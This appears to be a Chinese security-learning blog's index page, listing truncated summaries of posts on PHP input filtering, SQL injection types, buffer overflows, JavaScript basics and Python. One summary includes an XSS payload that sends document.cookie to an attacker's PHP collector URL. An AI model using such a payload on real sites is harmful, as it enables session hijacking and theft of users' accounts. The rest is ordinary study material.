摘要： trim() //去除空格 mysql_real_escape_string() //转义防止sql注入 htmlspecialchars() //将特殊符号转义（默认不对单引号进行处理） strip_tags() //过滤字符串中的HTML标签 CSRF(Cross-Site Request Fo 阅读全文

摘要： 缓冲区溢出的基本知识点： https://xz.aliyun.com/t/3784 https://baijiahao.baidu.com/s?id=1668767940652851301&wfr=spider&for=pc 运行前的初始化: service postgresql start //运 阅读全文

摘要： Javascript总体概述: js是指在网页上编写的脚本语言，是对HTML在功能上的扩展 js代码嵌入在HTML里，在客户端的浏览器上执行，属于前端语言 document是个对象，是指当前网页 .write()指属性，将内容写入网页中 加载外部js文件: <script src="/js/test 阅读全文

摘要： 该代码为接受cookie的php网页 盗取cookie的xss语句： <script>document.write('<img src="接受cookie的php的URL(以.php结尾)?cookie='+document.cookie+'" width=0 height=0 border=0 / 阅读全文

摘要： 1.数字型注入和字符型注入： 区别在于where $id=id 还是‘id’(也可以是其他闭合)。数字型的会直接将代码执行，而字符型会将其当作字符串对比，所以需要闭合注释。 2. php的一些函数： 3.php的一些注意事项： 4.mysql的模糊查询(搜索型注入): %代表任意数量的字符（相当于正 阅读全文

摘要： subprocess模块 multiprocessing的queue类 遗留问题 阅读全文

摘要： class Person(object): def __init__(self, name, age): self._name = name self._age = age # 访问器 - getter方法 @property def name(self): return self._name # 阅读全文